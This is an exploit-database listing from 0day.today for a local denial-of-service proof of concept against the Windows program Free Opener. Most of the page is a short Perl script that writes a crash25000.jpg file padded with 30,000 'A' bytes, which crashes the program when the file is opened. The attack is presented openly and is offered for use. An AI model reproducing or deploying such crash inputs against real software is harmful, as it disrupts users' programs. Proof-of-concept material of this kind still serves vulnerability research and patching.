[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Free Opener Local Denial of Service

Author
Iolo Morganwg
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17258
Category
dos / poc
Date add
09-12-2011
Platform
windows
#!/usr/bin/perl
 
# Exploit Title:  Free Opener Local Denial of Service
# Date: 09-12-11
# Author: Iolo Morganwg
# Download: http://dl.installiq.com/download/downloadpop.aspx?shortname=freeopener&a=13193&f=FO-Main
# Tested on: Windows XP SP3
 
#To trigger: Run script open with Free opener, program dies!.
 
my $file= "crash25000.jpg";
my $junk = "\x41" x 30000;
# my $junk2 = "\x42" x 5000;
 
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
 
print "File Created successfully\n";



#  0day.today [2024-12-24]  #